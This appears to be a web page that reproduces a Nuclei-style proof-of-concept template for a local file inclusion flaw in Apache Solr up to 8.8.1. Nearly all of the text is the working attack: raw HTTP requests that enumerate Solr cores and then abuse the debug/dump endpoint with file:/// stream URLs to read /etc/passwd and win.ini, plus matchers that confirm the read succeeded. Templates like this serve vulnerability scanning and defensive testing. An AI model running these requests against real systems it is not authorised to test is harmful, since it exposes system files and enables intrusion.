apache-solr-file-read: Apache Solr <=8.8.1 - Local File Inclusion

2025-08-01 Apache Solr PoC Public

Description

Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.

PoC

id: apache-solr-file-read

info:
  name: Apache Solr <=8.8.1 - Local File Inclusion
  author: DhiyaneshDk,philippedelteil
  severity: high
  description: Apache Solr versions prior to and including 8.8.1 are vulnerable to local file inclusion.
  reference:
    - https://twitter.com/Al1ex4/status/1382981479727128580
    - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
    - https://twitter.com/sec715/status/1373472323538362371
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-23,CWE-73
  metadata:
    max-request: 3
  tags: apache,solr,lfi,vuln

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../Windows/win.ini&param=ContentStream HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd&param=ContentStream HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: regex
        regex:
          - "root:.*:0:0:"

    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 490a004630440220417b8742255aa140dafc68f37a608e18d468fb6bc96bf1e038a292b801067eb202202efdbf89c4c5a29bb929b191fefcbb003e2fae04b1761ca1d2ea6b6bd1d869ab:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities